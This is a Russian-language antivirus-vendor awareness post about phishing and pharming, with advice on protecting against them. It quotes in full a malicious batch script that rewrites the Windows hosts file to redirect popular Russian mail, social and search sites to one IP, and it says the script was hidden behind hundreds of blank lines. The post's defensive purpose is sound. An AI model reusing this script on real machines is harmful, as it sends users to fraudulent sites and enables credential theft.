Вы используете устаревший браузер!

Страница может отображаться некорректно.

  • добавить в избранное
    Добавить в закладки

Поскользнулся, упал, очнулся — гипс!

Прочитали: 5897 Комментариев: 67 Рейтинг: 308

18 июля 2016

Кто не знает фишинг? Фишинг знают все! Действительно, о фишинге — интернет-мошенничестве с использованием почтовых рассылок с предложением товаров и услуг — известно подавляющему большинству пользователей. Естественно, уровень осведомленности растет, и они все более подозрительно относятся к приходящим письмам.

А злоумышленники, в свою очередь, придумывают новые уловки с целью выманивания денег у доверчивых и добрых людей.

#drweb

Банк России выявил сайт Mngb.ru, незаконно предлагающий услуги от лица некоего Metro Neal Guardian Bank. Этой организации ЦБ не выдавал лицензию для работы в России, отмечается в релизе регулятора.

Между тем на сайте Mngb.ru сказано: «Генеральная лицензия на осуществление банковских операций № 1366, выдана Центральным Банком РФ 14.01.2015, бессрочная».

Утверждается, что центральный офис банка расположен в Вашингтоне, а представительство в России находится по адресу: Москва, Волоколамское шоссе, 90 строение 3. Между тем на московских картах по такому адресу банка не значится. В здании находится только государственное машиностроительное КБ имени И. И. Торопова «Вымпел».

На сайте также указан несуществующий ИНН. Мошенники предлагают оформить кредитные карты Visa и MasterCard.

Банк России призывает проверять информацию по зарегистрированным банкам на своем сайте.

http://polit.ru/news/2016/07/12/false_bank

Фарминг ("pharming" – производное от английских слов "phishing" и "farming" – занятие сельским хозяйством, животноводством).

Как и фишеры, люди, занимающиеся фармингом, используют мошеннические сайты, но жертвы попадают туда без добровольного клика по ссылке, а совершенно незаметно для себя.

Пользователи перенаправляются на мошеннический сайт автоматически — даже тогда, когда вводят правильный веб-адрес.

Для этого жулики используют вредоносное ПО, вносят изменения в файл hosts и настройки сервиса DNS. Так атака становится незаметной, а участие пользователя сводится к минимуму. В принципе, атака может быть даже целевой – злоумышленнику достаточно дождаться, когда пользователь решит посетить определенные сайты.

Насколько сложно выманить жертву на сайт фармера (не путать с фермером!)? Один из сценариев ловушки.

— Здравствуй ) У меня не рaбoтает фaйл один нужный, можешь прoверить у себя?
— Могу, привет)

...

Ничего не подозревающий пользователь щелкает по этому файлу и… выполняется следующий код:

@rem ----- ExeScript Options Begin -----
@rem ScriptType: console
@rem DestDirectory: temp
@rem Icon: default
@rem ----- ExeScript Options End -----
@echo off
echo 81.94.229.115 www.mail.i.ua >> %windir%\system32\drivers\etc\hosts
echo 81.94.229.115 mail.i.ua >> %windir%\system32\drivers\etc\hosts
echo 81.94.229.115 www.m.vkontakte.ru >> %windir%\system32\drivers\etc\hosts
echo 81.94.229.115 m.vkontakte.ru >> %windir%\system32\drivers\etc\hosts
echo 81.94.229.115 mail.ru >> %windir%\system32\drivers\etc\hosts
echo 81.94.229.115 www.mail.ru >> %windir%\system32\drivers\etc\hosts
echo 81.94.229.115 www.yandex.ru >> %windir%\system32\drivers\etc\hosts
echo 81.94.229.115 yandex.ru >> %windir%\system32\drivers\etc\hosts
echo 81.94.229.115 www.vkontakte.ru >> %windir%\system32\drivers\etc\hosts
echo 81.94.229.115 vkontakte.ru >> %windir%\system32\drivers\etc\hosts
echo 81.94.229.115 www.odnoklasniki.ru >> %windir%\system32\drivers\etc\hosts
echo 81.94.229.115 odnoklasniki.ru >> %windir%\system32\drivers\etc\hosts
echo 81.94.229.115 www.google.ru >> %windir%\system32\drivers\etc\hosts
echo 81.94.229.115 google.ru >> %windir%\system32\drivers\etc\hosts
echo 81.94.229.115 www.rambler.ru >> %windir%\system32\drivers\etc\hosts
echo 81.94.229.115 rambler.ru >> %windir%\system32\drivers\etc\hosts
echo 81.94.229.115 www.ya.ru >> %windir%\system32\drivers\etc\hosts
echo 81.94.229.115 ya.ru >> %windir%\system32\drivers\etc\hosts

Кстати, перед собственно телом скрипта в файле 662 пустые строки.

https://habrahabr.ru/post/73515

В результате вместо всех указанных выше сайтов откроется сайт мошенников. #фишинг #мошенничество

Антивирусная правДА! рекомендует

Защититься от фарминга крайне сложно, сайты компаний изменяются постоянно, и пользователи не могут регулярно отслеживать такие изменения. Чтобы застраховаться от перенаправления на другой сайт, рекомендуется:

  • Контролировать попытки изменения файла Hosts, выбрав удобный для вас уровень работы Превентивной защиты Dr.Web Security Space.

    #drweb

    #drweb

    Для настройки параметров Превентивной защиты кликните по значку #drweb в системном меню, затем в открывшемся меню последовательно нажмите на #drweb и появившийся значок #drweb. В открывшемся окне Настройки выберите пункт Компоненты защиты и далее Превентивная защита.

    Здесь вы можете настроить реакцию антивируса на действия сторонних приложений, которые могут привести к заражению вашего компьютера.

    #drweb

  • Изменения сетевых настроек возможны во многом благодаря тому, что пользователи работают с правами администраторов, и получившие доступ к компьютеру злоумышленники могут распоряжаться его настройками именно с этими правами. Не следует работать с правами администраторов после завершения настроек своего компьютера!
  • Регулярно проверяйте выписки со своего банковского счета. Развитие интернет-банкинга – это удобство не только для пользователей, но и для злоумышленников. Банки могут уведомлять клиентов обо всех или только подозрительных операциях, но эти сообщения могут быть скрыты или подделаны.

    Только вы владеете достоверной информацией о том, где были потрачены деньги, поэтому не забывайте регулярно проверять баланс своего счета!

  • Устанавливайте все обновления безопасности для операционной системы и используемого ПО.
  • Не следует вводить личные сведения на сайте, на который вы попали по внешней ссылке или из всплывающего рекламного сообщения (даже на легитимном веб-сайте). Откройте новое окно браузера и введите ip-адрес ресурса (узнав его, например, на ином устройстве) вручную в адресной строке, чтобы убедиться в подлинности сайта. Прежде чем вводить личные данные, всегда проверяйте правильность URL страницы.
  • Получив электронное письмо от имени банка, интернет-магазина, социальной сети или любой другой компании, убедитесь, что оно отправлено с официального электронного адреса организации. Для общения с клиентами банки не используют такие общедоступные домены как gmail.com, yahoo.co.uk и т. д.
  • Гарантированно уничтожайте ненужную финансовую информацию. Пользователи часто выбрасывают бумаги с такими сведениями, в том числе распечатанные документы с данными интернет-банкинга, счета с записанными паролями и т. п. Любую личную информацию, включая выписки с банковского счета и карты с истекшим сроком действия, рекомендуется уничтожать путем измельчения.
  • Сообщайте о случаях мошенничества в Интернете. В частности, это можно сделать непосредственно на сайте «Доктор Веб», отправив запрос в службу поддержки. Ваша информация важна не нам – она важна всем пользователям, которых стремятся поймать на удочку!

Оцените выпуск

Сделайте репост

Необходимо войти на страницу выпуска через аккаунт на сайте «Доктор Веб» (или создать аккаунт). Аккаунт должен быть связан с вашим аккаунтом в социальной сети. Видео о связывании аккаунта.


Нам важно ваше мнение

Чтобы оставить комментарий, нужно зайти через свой аккаунт на сайте «Доктор Веб». Если аккаунта еще нет, его можно создать.

Комментарии пользователей


 
На страницу: